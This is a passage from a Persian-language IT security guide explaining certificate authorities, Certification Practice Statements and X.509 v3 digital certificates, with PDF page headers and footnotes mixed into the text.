‫ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ ﻛﻪ ﺁﻥ ﻛﻠﻴﺪﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺁﻧﺮﺍ ﺍﻣﻀﺎ ﻛﻨﺪ ﻭﺍﻗﻌﹰﺎ ﺑﻪ ﻳﻚ ﺩﺍﻧﺸﺠﻮﻱ ﺣﻘﻴﻘﻲ ﺗﻌﻠﻖ ﺩﺍﺭﺩ ﻳﺎ ﻧﻪ‪ .‬ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﻳﮕﺮ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻴﭻ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺰﺭﮔﺘﺮﻳﻦ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺟﻬﺎﻥ ‪ - VeriSign -‬ﭼﻨﺪﻳﻦ ﻧﻮﻉ ﻣﺨﺘﻠﻒ ﮔﻮﺍﻫﻲ ﻣﻨﺘـﺸﺮ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺮﻛﺰ ﺗﺤﺖ ﺷﺒﻜﺔ ﻣﻄﻤﺌﻦ ‪ ١٣٦(VTN) VeriSign‬ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻋﻤـﻮﻡ ﺻـﺎﺩﺭ ﻣـﻲﻛﻨـﺪ‪ .‬ﺍﻳـﻦ ﺷـﺮﻛﺖ‬
‫ﻫﻤﭽﻨﻴﻦ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺷﺮﻛﺘﻬﺎ ﺻﺎﺩﺭ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﭘﺎﺋﻴﻦﺗﺮﻳﻦ ﺳﻄﺢ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺻﺎﺩﺭ ﺷﺪﻩ ﺗﻮﺳﻂ ‪ VTN‬ﻫـﻴﭻ ﺗـﻀﻤﻴﻨﻲ‬
‫ﺍﺭﺍﺋﻪ ﻧﻤﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺎﻻﺗﺮﻳﻦ ﺳﻄﻮﺡ ﺁﻥ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ‪ VTN‬ﻗﺒﻞ ﺍﺯ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ ،‬ﺻﺎﺣﺐ ﻛﻠﻴﺪ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻣﻀﺎ ﻣﻲﺷﻮﺩ ﻣﺎﻧﻨﺪ ﺷﻨﺎﺳﻨﺎﻣﻪ ﻣﻲﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻣﻀﺎ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﺷﺎﻣﻞ‬
‫ﺍﻃﻼﻋﺎﺕ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻣﻀﺎ ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻭ ﺍﻃﻼﻋـﺎﺗﻲ ﭼـﻮﻥ ﻧـﺎﻡ ﻣﺮﮐـﺰ‪،‬‬
‫‪134 Signing Parties‬‬
‫‪135 Certification Authority‬‬
‫‪136 VeriSign Trusted Network‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٣٢١‬‬
‫ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﺮﮐﺰ‪ ،‬ﻭ ﻧﻴﺰ ﻳﻚ ﺷﻤﺎﺭﻩ ﺳﺮﻳﺎﻝ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺗﺎ ﺍﻣﺮﻭﺯ ﺑﻴﺸﺘﺮﻳﻦ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔـﻮﺍﻫﻲ‪ ،‬ﮔـﻮﺍﻫﻲﻫـﺎﻳﻲ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺧﺎﺹ ﺑﻪ ﻓﺮﺩ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺧﺎﺻﻲ ﺗﻌﻠﻖ ﺩﺍﺭﺩ‪ .‬ﮔﻮﺍﻫﻲﻫﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺮﺍﻱ ﺍﺛﺒـﺎﺕ‬
‫ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪ ،‬ﻣﺸﺎﺑﻪ ﻣﺜﺎﻝ ﺩﺍﻧﺸﮕﺎﻩ ﻛﻪ ﭘﻴﺸﺘﺮ ﺫﻛﺮ ﺷﺪ‪ .‬ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺧﺪﻣﺎﺕ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﮐﺮﺩ‪:‬‬
‫ﻣﺮﮐﺰ ﺩﺍﺧﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‬
‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺷﺎﻏﻠﻴﻦ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﻳـﻚ ﻣﺮﮐـﺰ ﺩﺍﺧﻠـﻲ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺎﻡ‪ ،‬ﻣﻮﻗﻌﻴﺖ‪ ،‬ﻭ ﺳﻄﺢ ﺍﺧﺘﻴﺎﺭ ﻳﻚ ﻓﺮﺩ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﺩ‪ .‬ﺍﻳـﻦ ﮔـﻮﺍﻫﻲﻫـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺩﺍﺧـﻞ‬
‫ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺩﺍﺧﻠﻲ ﻭ ﮔﺮﺩﺵ ﺍﻃﻼﻋﺎﺕ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪ .‬ﺍﻳﻦ ﻣﺮﮐﺰ ﺩﺍﺧﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﭘﺎﻳـﻪﺍﻱ ﺑـﺮﺍﻱ‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﮐﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺳﺎﺯﻣﺎﻥ ﺑﺎﺷﺪ‪.‬‬
‫ﺷﺮﻛﺘﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻳﻚ ﻣﺮﮐﺰ ﺩﺍﺧﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻛﻪ ﺑﺮﺍﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ‪،‬‬
‫ﭼﻨﺪ ﺗﺎﻻﺭ ﺑﻮﺭﺱ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﻣﺠﺒﻮﺭ ﻛﺮﺩﻧﺪ ﺑﺮﺍﻱ ﺁﻧﻜﻪ ﺍﺟﺎﺯﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﻪ ﺩﺍﺩ ﻭ ﺳـﺘﺪﻫﺎﻱ ﭘﺮﺑﻬـﺎ ﺑﭙﺮﺩﺍﺯﻧـﺪ‪،‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﻻﺯﻡ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ‪.‬‬
‫ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﺮﻭﻧﺴﭙﺎﺭﻱﺷﺪﻩ‬
‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﺪ ﻛﻪ ﺩﺭ ﻣﺰﺍﻳﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺳﻬﻴﻢ ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﺗﻮﺍﻧﺎﻳﻲ ﺗﻜﻨﻴﻜﻲ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺁﻧﺮﺍ ﻧﺪﺍﺷﺘﻪ‬
‫ﺑﺎﺷﺪ‪ .‬ﭼﻨﻴﻦ ﺳﺎﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺧﺎﺭﺟﻲ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺒﻨﺪﺩ ﺗﺎ ﺧﺪﻣﺎﺕ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﺮﺍﻱ ﺷﺎﻏﻠﻴﻦ ﻭ ﻣﺸﺘﺮﻳﺎﻧﺶ ﻓﺮﺍﻫﻢ ﻛﻨﺪ‪،‬‬
‫ﺩﺭﺳﺖ ﻣﺜﻞ ﺷﺮﻛﺘﻲ ﻛﻪ ﺑﺮﺍﻱ ﺻﺪﻭﺭ ﻛﺎﺭﺗﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺎ ﻳﻚ ﻣﺮﻛﺰ ﭼﺎﭖ ﻋﻜﺲ ﻗﺮﺍﺭﺩﺍﺩ ﻣﻲﺑﻨﺪﺩ‪.‬‬
‫ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺷﺨﺺ ﺛﺎﻟﺚ ﻣﻄﻤﺌﻦ‬
‫ﻳﻚ ﺷﺮﻛﺖ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺩﻭﻟﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﺗﺎ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺭﺍ ﺑﻪ ﺍﺳﺎﻣﻲ ﻗـﺎﻧﻮﻧﻲ‬
‫ﺍﻓﺮﺍﺩ ﻭ ﺷﺮﻛﺘﻬﺎ ﭘﻴﻮﻧﺪ ﺩﺍﺩﻩ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﻴﭻ ﺭﺍﺑﻄﻪ ﻗﺒﻠﻲ ﻧﺪﺍﺷﺘﻪﺍﻧﺪ ﺍﺟﺎﺯﻩ ﺩﻫـﺪ ﻛـﻪ‬
‫ﻫﺮﻳﮏ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺩﻳﮕﺮﻱ ﺗﺼﺪﻳﻖ ﻛﻨﻨﺪ ﻭ ﺑﻪ ﻣﻌﺎﻣﻼﺕ ﻗﺎﻧﻮﻧﻲ ﺑﭙﺮﺩﺍﺯﻧﺪ‪ .‬ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺑﻮﺳـﻴﻠﺔ ﻳـﻚ ﻣﺮﻛـﺰ ﺟﻬـﺎﻧﻲ ﺻـﺪﻭﺭ‬
‫ﮔﻮﺍﻫﻲ ﺻﺎﺩﺭ ﻣﻲﺷﻮﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎﻱ ﺭﺍﻧﻨﺪﮔﻲ ﻭ ﻛﺎﺭﺗﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻳﻚ ﺩﻭﻟﺖ ﺻﺎﺩﺭ ﻣﻲﺷﻮﺩ ﺑﺮﺍﺑﺮﻱ ﻛﻨﻨﺪ‪.‬‬
‫ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻛﻪ ﻛﻠﻴﺪﻫﺎﻱ ﺁﻧﻬﺎ ﺍﺯ ﻗﺒﻞ ﺩﺭ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﻳﺎ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻧـﺸﺪﻩ ﺿـﺮﺭ‬
‫ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺍﮔﺮﭼﻪ ‪ Microsoft‬ﻭ ‪ Netscape‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺭﻫﺎﻱ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﻭﻱ ﻫﺮ ﻣﺮﮐﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ‬
‫ﻻﺯﻣﻪﻫﺎﻱ ﺗﺼﺪﻳﻖ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﺳﺎﺯﺩ ﻣﻲﮔﺸﺎﻳﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﺍﺻﻠﻲ ﻭﺏ ﺑﺎ ﺗﻌﺪﺍﺩ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ‪ CA‬ﻛﻪ ﺑﻪ ﺩﻗﺖ ﺍﻧﺘﺨﺎﺏ‬
‫ﺷﺪﻩﺍﻧﺪ ﺗﻮﺯﻳﻊ ﮔﺸﺘﻪﺍﻧﺪ‪ .‬ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺍﻳﻦ ﻛﻠﻴﺪﻫﺎ ﺩﺭ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﻣﺘﻴﺎﺯ ﺑﺰﺭﮔﻲ ﺑﺮﺍﻱ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻨﺘﺸﺮﻛﻨﻨﺪﺓ ﺁﻧﻬﺎ ﻭ ﻣـﺎﻧﻌﻲ ﺑـﺮﺍﻱ‬
‫ﺳﺎﻳﺮﻳﻦ ﺑﻮﺩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺑﺮﺍﻱ ﺁﻧﻜﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺻﺎﺩﺭ ﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ ،‬ﺑﺎﻳﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺁﻥ ﻣﺮﮐﺰ ﺭﺍ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺑﺎ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩﺷﺎﻥ ﺻﺎﺩﺭ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺩﺭ ﻣﺮﻭﺭﮔﺮ ﻭﺏ‬
‫ﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺍﺯ ﭘﻴﺶ ﻗﺮﺍﺭﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ‪ .‬ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﺩﺳﺘﻲ ﻫﻢ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮ ﻧﻬـﺎﻳﻲ ﺍﺿـﺎﻓﻪ‬
‫ﺷﻮﻧﺪ‪.‬‬
‫‪٣٢٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺳﻴﺎﺳﺖ ﻛﺎﺭﺑﺮﺩ ﮔﻮﺍﻫﻲ )‪(CPS‬‬
‫ﺳﻴﺎﺳﺖ ﮐﺎﺭﺑﺮﺩ ﮔﻮﺍﻫﻲ )‪ ١٣٧(CPS‬ﻳﻚ ﺳﻨﺪ ﻗﺎﻧﻮﻧﻲ ﺍﺳﺖ ﻛﻪ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺁﻧﺮﺍ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﺪ ﻭ ﺗﻮﺻﻴﻒﻛﻨﻨـﺪﻩ ﺧـﻂﻣـﺸﻲﻫـﺎ ﻭ‬
‫ﻓﺮﺍﻳﻨﺪﻫﺎ ﺑﺮﺍﻱ ﺻﺪﻭﺭ ﻭ ﺍﺑﻄﺎﻝ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ‪ CPS .‬ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻔﻬـﻮﻡ ﺗﺄﻳﻴـﺪ‬
‫ﻳﻚ ﻛﻠﻴﺪ ﺗﻮﺳﻂ ﺁﻥ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﭼﻴﺴﺖ‪.‬‬
‫ﺍﺳﻨﺎﺩ ‪ CPS‬ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺗﻮﺳﻂ ﺍﻧﺴﺎﻥ ﻭ ﻧﻪ ﻣﺎﺷﻴﻦ ﺧﻮﺍﻧﺪﻩ ﺷﻮﻧﺪ‪ .‬ﻳﻚ ﺷﺮﻛﺖ ﺗﺠﺎﺭﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﺪ ﮔﻮﺍﻫﻲ ﻳـﻚ ﻣﺮﮐـﺰ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﭙﺬﻳﺮﺩ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺪﺍﻗﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺿﻤﺎﻧﺖ ﻣﻲﻛﻨﺪ ﻭ ﻓﺮﺽ ﺭﺍ ﺑﺮ ﺳﻄﺢ ﻣﻌﻴﻨـﻲ ﺍﺯ ﺗﻌﻬـﺪ ﺩﺭ ﻗﺒـﺎﻝ ﺩﻧﺒـﺎﻝ‬
‫ﻧﺸﺪﻥ ﺧﻂ ﻣﺸﻲﻫﺎﻱ ﮔﻮﺍﻫﻲ ﺑﮕﺬﺍﺭﺩ ‪ -‬ﻭ ﺑﺨﻮﺍﻫﺪ ﻛﻪ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺗﻮﺳﻂ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻌﺘﺒﺮ ﺗﻀﻤﻴﻦ ﺷﺪﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﮔﻮﺍﻫﻲ ‪X.509 v3‬‬
‫ﺍﮔﺮﭼﻪ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮ ﻧﻮﻋﻲ ﮔﻮﺍﻫﻲ ﺻﺎﺩﺭ ﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺑﻴﺸﺘﺮ ﺁﻧﻬﺎ ﮔـﻮﺍﻫﻲﻫـﺎﻳﻲ ﺻـﺎﺩﺭ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﻃﺒـﻖ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ X.509 v3‬ﻫﺴﺘﻨﺪ‪ .‬ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ‪ ،‬ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﺍﺯ ﺟﻤﻠـﻪ ‪ SSL‬ﺗﻨﻬـﺎ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻣﺠﻮﺯﻫﺎﻱ ‪ X.509 v3‬ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺗﻨﻬﺎ ﺍﺳﺘﺜﻨﺎﺀ ﻣﻬﻢ ﺩﺭ ﺍﻳﻨﺠﺎ ‪ PGP‬ﺍﺳﺖ‪ ،‬ﻛﻪ ﺍﺯ ﻗﺎﻟﺐ ﮔﻮﺍﻫﻲ ﻣﺨـﺼﻮﺹ ﺑـﻪ ﺧـﻮﺩﺵ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﺪ‪ ،‬ﺍﮔﺮﭼﻪ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺧﻴﺮ ﺁﻥ ﺑﻌﻀﻲ ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ ‪ X.509‬ﺭﺍ ﻧﻴﺰ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ‪) .‬ﺑﺮﻧﺎﻣـﻪ ‪ SSH‬ﺍﺯ ﻣﺠﻮﺯﻫـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﻛﻨـﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﺩﺭﻋﻮﺽ ﻣﺘﻜﻲ ﺑﻪ ﺗﺄﻳﻴﺪ ﺷﺨﺼﻲ ﻛﻠﻴﺪ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺖ‪(.‬‬
‫ﻫﺮ ﮔﻮﺍﻫﻲ ‪ X.509‬ﺷﺎﻣﻞ ﻳﻚ ﺷﻤﺎﺭﺓ ﻧﺴﺨﻪ‪ ،‬ﺷﻤﺎﺭﺓ ﺳﺮﻳﺎﻝ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺷﻨﺎﺳﺎﻳﻲ‪ ،‬ﺍﻃﻼﻋـﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺍﻟﮕـﻮﺭﻳﺘﻢ‪ ،‬ﻭ ﺍﻣـﻀﺎﻱ ﻣﺮﻛـﺰ‬
‫ﺻﺎﺩﺭﻛﻨﻨﺪﺓ ﮔﻮﺍﻫﻲ ﺍﺳﺖ‪ .‬ﺻﻨﻌﺖ ﺑﺠﺎﻱ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﻭﻟﻴﻪ ‪ ،X.509‬ﮔﻮﺍﻫﻲﻫﺎﻱ ‪ X.509 v3‬ﺭﺍ ﺑﺮﮔﺰﻳﺪ‪ ،‬ﭼـﻮﻥ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ‪X.509 v3‬‬
‫ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩ ﻛﻪ "ﻧﺎﻡ" ﻭ "ﻣﻘﺪﺍﺭ" ﺩﻟﺨﻮﺍﻩ ﺑﺘﻮﺍﻧﻨﺪ ﻣﺸﻤﻮﻝ ﮔﻮﺍﻫﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺩﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑـﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﺑـﺴﻴﺎﺭﻱ ﺑﻜـﺎﺭ ﺭﻭﻧـﺪ ﻭ‬
‫ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎ ﺑﺪﻭﻥ ﺗﻐﻴﻴﺮ ﭘﺮﻭﺗﻜﻞ ﻣﺮﺑﻮﻃﻪ ﮔﺴﺘﺮﺵ ﻳﺎﺑﺪ‪.‬‬
‫ﺍﻧﻮﻉ ﮔﻮﺍﻫﻲﻫﺎ‬
‫ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﻣﺮﻭﺯ ﭼﻬﺎﺭ ﻧﻮﻉ ﻣﺠﻮﺯ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺳﺖ‪:‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‬
‫ﻻ‬
‫ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺷﺎﻣﻞ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﻧﺎﻡ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻳﺎ ﻧﺎﻡ ﺧﺪﻣﺎﺕ ﺧﺎﺻﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺁﻥ ﮔﻮﺍﻫﻲ ﺻﺎﺩﺭ ﻣﻲﺷﻮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
